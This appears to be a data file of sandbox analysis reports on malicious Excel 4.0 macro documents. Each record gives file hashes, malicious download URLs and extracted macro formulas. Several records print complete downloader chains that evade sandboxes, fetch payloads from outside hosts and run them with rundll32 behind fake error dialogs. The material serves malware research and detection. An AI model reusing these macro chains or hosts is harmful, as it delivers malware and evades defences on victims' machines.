{"version":"0.2","sample":{"sample":"","kind":"file","target":"4fd74fb78e849c244849f9bed8bed788fe53cd1fe79d49d8afaa426ae85216f5"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4fd74fb78e849c244849f9bed8bed788fe53cd1fe79d49d8afaa426ae85216f5","filesize":185344,"md5":"a755491d88e097227c45cc592cd49a5a","sha1":"7a1ed346111233c9b0958a9cf6aeb51e553b33ab","sha256":"4fd74fb78e849c244849f9bed8bed788fe53cd1fe79d49d8afaa426ae85216f5","sha512":"494331e1071f0580c7ed35486daeab56963f45a4ae81b3b7bb6584b87b2cc53279aa66549d8c5920e9a8a346aa5707d844a9af5c7314651cffbd722708b411e2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4fd74fb78e849c244849f9bed8bed788fe53cd1fe79d49d8afaa426ae85216f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4fdae07174578f4cac18f75390979762eb82295a2791b9e698af2e9e6010d868"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4fdae07174578f4cac18f75390979762eb82295a2791b9e698af2e9e6010d868","filesize":185344,"md5":"7083de738f94db2eb741b84ebdcf8947","sha1":"8252c4b6f7a4596b1d89e94c33f35e0f3963ca02","sha256":"4fdae07174578f4cac18f75390979762eb82295a2791b9e698af2e9e6010d868","sha512":"f559a2025c3240c7ec54c2de6e3e50c852580e4a592b5412812cd6a71192956fa68b9354fb160e25fc071b438d61a6f4c578626f4342b568f87260abaa18c2d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4fdae07174578f4cac18f75390979762eb82295a2791b9e698af2e9e6010d868.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4fdbe00dc51a08accc995e4723d932c0dbcbce6bf74d838f4fbc52c0d212f3fa"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4fdbe00dc51a08accc995e4723d932c0dbcbce6bf74d838f4fbc52c0d212f3fa","filesize":185344,"md5":"d794e79da98cf352dc88f5d8442f5bfe","sha1":"7ef8373a0c62b8768af26c5588882675bdfbcbaf","sha256":"4fdbe00dc51a08accc995e4723d932c0dbcbce6bf74d838f4fbc52c0d212f3fa","sha512":"b0a8cdbea68db0980d5fe3938fcdb3399081c90eb3bb26b8729c8e74d594f6fcbc0cbcca8361f6f330ac41e40f1aac9e452d2627178af6825df646af7c19b3c3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4fdbe00dc51a08accc995e4723d932c0dbcbce6bf74d838f4fbc52c0d212f3fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4fdd9b18cf3c7b9fe9d4a42e4fa8912575f02ea567a5ba67bc98f75da1a710fb"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4fdd9b18cf3c7b9fe9d4a42e4fa8912575f02ea567a5ba67bc98f75da1a710fb","filesize":219136,"md5":"a5c3158588607d6ed2286629003e7bc2","sha1":"717bb9502a23669b3c416f157440e0d85de92949","sha256":"4fdd9b18cf3c7b9fe9d4a42e4fa8912575f02ea567a5ba67bc98f75da1a710fb","sha512":"3da6109f39f6746b3c8f0dc601563a9fc7869f63b8d47141c044f418801bb7d865b755013c3a1b926f0edf905636e27b9564b5eac605c388b190732aaf09160e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4fdd9b18cf3c7b9fe9d4a42e4fa8912575f02ea567a5ba67bc98f75da1a710fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WKFCA5ddbz\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ffb765e9f4440d28b69b4c360d96c30791a25cba5b456b2bcbd98cd7cb20174"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4ffb765e9f4440d28b69b4c360d96c30791a25cba5b456b2bcbd98cd7cb20174","filesize":112640,"md5":"ada355d1bd871205b7fcbfb2c785e7c6","sha1":"77a859e7c948a88e0fd26ab147f51dd95d6368b5","sha256":"4ffb765e9f4440d28b69b4c360d96c30791a25cba5b456b2bcbd98cd7cb20174","sha512":"c9f0181cd93a5bd3a8d792965b6b24397405389a5c08e0251ac33c80e746de6a83ee4d6dfc99c30b46679235b14879410a148b07feec912c41c486948463d899","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ffb765e9f4440d28b69b4c360d96c30791a25cba5b456b2bcbd98cd7cb20174.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"AH5Tvnb7mG\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"500df8f5940fe14934a066b1df057945d9d302e3d7b4feecf30a34c86078126c"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"500df8f5940fe14934a066b1df057945d9d302e3d7b4feecf30a34c86078126c","filesize":112128,"md5":"35ee8573bc5ae3b8363e463fe7a598c7","sha1":"0dfbd499d594572ce35eab914c00a31f888fba6b","sha256":"500df8f5940fe14934a066b1df057945d9d302e3d7b4feecf30a34c86078126c","sha512":"8e923a5db51cd174891b03ce35fecba58b5b86427d653a22513f926a94dc9d2c259c42eb3af31f8de7bc4286efaeb975af0a19d80544d350eb797a00b290a854","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"500df8f5940fe14934a066b1df057945d9d302e3d7b4feecf30a34c86078126c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50102a8e81adfa660489a3fb64e7150c06ddac2ebdcc5a5166f0323ceee9e242"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"50102a8e81adfa660489a3fb64e7150c06ddac2ebdcc5a5166f0323ceee9e242","filesize":185344,"md5":"df70f538762794bb21907be20162e7c9","sha1":"40ec90d33966b43e645e33ea1791fda8e90684dc","sha256":"50102a8e81adfa660489a3fb64e7150c06ddac2ebdcc5a5166f0323ceee9e242","sha512":"1956628ab996cb68c4d681f1c8bba41e8cb840bcac063f2812b0393349d38cd319f75569fa8890114b111dfb0f2669e76315c388a072678dad16fb60cdab56bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50102a8e81adfa660489a3fb64e7150c06ddac2ebdcc5a5166f0323ceee9e242.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"501cd7b2a64a6044800c07f5efdbdc9450d020194fa9bb2e6b94a000af930844"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"501cd7b2a64a6044800c07f5efdbdc9450d020194fa9bb2e6b94a000af930844","filesize":112128,"md5":"079d66be8b3ba5efca84f8bf337c1f0f","sha1":"904b35043ef6c4eb479903bdc6847c4c72f70a18","sha256":"501cd7b2a64a6044800c07f5efdbdc9450d020194fa9bb2e6b94a000af930844","sha512":"797198fdf79b75728bc4519656d9580d7b74455fb8fbdc742550f41de2293d61c323d5248074e6a05a0ad80f914310bee9cafd74d6420743d300b663210bf465","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"501cd7b2a64a6044800c07f5efdbdc9450d020194fa9bb2e6b94a000af930844.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"502b114aefb9a2685e46a0663c56e3465a57b7771c972d8457ed1e96ff87cf64"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"502b114aefb9a2685e46a0663c56e3465a57b7771c972d8457ed1e96ff87cf64","filesize":116224,"md5":"f65075a6c132279dfc86a1eae2229b02","sha1":"a603e9a848f606190dbf2f2d1efd277eb8bc3c28","sha256":"502b114aefb9a2685e46a0663c56e3465a57b7771c972d8457ed1e96ff87cf64","sha512":"f4dcb490dedcb623a469ea6f11d64627a70a7ed2be22fffc90faab0d2172e2c2cb7ecfc4bcc9ef1574c9fca1e779f77c351af378afc6d393ec73441df2615a02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"502b114aefb9a2685e46a0663c56e3465a57b7771c972d8457ed1e96ff87cf64.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i8zqenXFzR\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5036aeb515a544be946291645b5541e3f8c39ed182b5902f40d07c08ee9f34b8"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"5036aeb515a544be946291645b5541e3f8c39ed182b5902f40d07c08ee9f34b8","filesize":206336,"md5":"12a51202b72d58ffd568d0448f7b1fa5","sha1":"55d27c004403695f6e880328749c48cf80956db3","sha256":"5036aeb515a544be946291645b5541e3f8c39ed182b5902f40d07c08ee9f34b8","sha512":"8ab9e2a52c2e006cd61710b63f1fa2f4a60080710eb38929398cf75b3b1b89b9f3b070192c5e203ea52ce7f70eb4e89d0b6fe3946f733ca11100729fcb997f0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5036aeb515a544be946291645b5541e3f8c39ed182b5902f40d07c08ee9f34b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0M7YLIbmeS\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"504da9a26d52a2bb1f3aee0f5bed5f135ce0460291a17b9f9d32a8a35a1ca9d0"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"504da9a26d52a2bb1f3aee0f5bed5f135ce0460291a17b9f9d32a8a35a1ca9d0","filesize":168448,"md5":"67e82973bbf29ab393f561a05a6878d3","sha1":"603931aa9fe17919683871826019fc971af6b3d3","sha256":"504da9a26d52a2bb1f3aee0f5bed5f135ce0460291a17b9f9d32a8a35a1ca9d0","sha512":"d8effe24772bb27349b001d2cc0095a452dffa70af7291b2b7b29779cadb35bfbbedbaf42077926898d62b2e8e974fc666a563a2729f1591d92e9db58adcf3cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"504da9a26d52a2bb1f3aee0f5bed5f135ce0460291a17b9f9d32a8a35a1ca9d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7TkUTzVXv4\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"505f974b2efb217f3fc14543367b774873623024bfd9811fac7258c529699d79"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"505f974b2efb217f3fc14543367b774873623024bfd9811fac7258c529699d79","filesize":185344,"md5":"ac6d5b3a329158c921192136d535d50a","sha1":"7e4d4fb5fb91676d8326c7ca9348223983c6ecab","sha256":"505f974b2efb217f3fc14543367b774873623024bfd9811fac7258c529699d79","sha512":"51b690a4fb6501e401666ed49f3cb003acda390a88844e908d30356e88fa28405ac2fa031a96b33f6926b740dfef2125ac578d42cbcfda98c26b90625a8d8673","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"505f974b2efb217f3fc14543367b774873623024bfd9811fac7258c529699d79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5067d360b042e6bf8b5405a554a7db98c64e7679cea2311d02e66e2ddaa7f677"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"5067d360b042e6bf8b5405a554a7db98c64e7679cea2311d02e66e2ddaa7f677","filesize":171008,"md5":"2ef1aa045444bfddff5a8a2b33a0dcb4","sha1":"c12454aa77cbab3a5fe49488e50265322843fcd8","sha256":"5067d360b042e6bf8b5405a554a7db98c64e7679cea2311d02e66e2ddaa7f677","sha512":"cea5f1eafb92463579aeab6fe1ff0b7452905d4ac6b48fabe98af5143ca3399dd258cdc73629c64580873e05a5a71717590e43507347daacc3130c5ff187d5c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5067d360b042e6bf8b5405a554a7db98c64e7679cea2311d02e66e2ddaa7f677.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HVyhoiLQRv\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5076a4564d6ea29b2de45547d32a40a6d86beba2643941e3df5362ac35a90d3f"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"5076a4564d6ea29b2de45547d32a40a6d86beba2643941e3df5362ac35a90d3f","filesize":116224,"md5":"2cf749489eb96ea61e955dc7454cc868","sha1":"1d84f280730cabc4de0e7bdbe2b22c32a9fad845","sha256":"5076a4564d6ea29b2de45547d32a40a6d86beba2643941e3df5362ac35a90d3f","sha512":"ed887df9a4078da941892707ff7c79bfcacaccc370234c70cfeef6807a7e90ea4aa6e605cbdf50bfcc106008147ef1e1c4e7aa87082406ccbb9c43c0f2def537","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5076a4564d6ea29b2de45547d32a40a6d86beba2643941e3df5362ac35a90d3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gria5NyrKp\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"507fb8d047da68a0e9cc60d43b2e5275a3a8031759b5a9ee3ebb31656819bfb6"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"507fb8d047da68a0e9cc60d43b2e5275a3a8031759b5a9ee3ebb31656819bfb6","filesize":209920,"md5":"521a1349c16ea8507b8e1698bc7b1a15","sha1":"41e159f34553b28057d4f8412a5b3b69bbc467dc","sha256":"507fb8d047da68a0e9cc60d43b2e5275a3a8031759b5a9ee3ebb31656819bfb6","sha512":"ec07843e0437f227b90aaf353822b1b2258ee833a0aceadea55da328098ac7ca1c770251a4b351a855d28eab5017e71f3e40f45687c4376a25f4b3a9cbc36ca9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"507fb8d047da68a0e9cc60d43b2e5275a3a8031759b5a9ee3ebb31656819bfb6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tINO0Wi7sq\",TRUE)\nGOTO(R$0C$16)"}}}]}
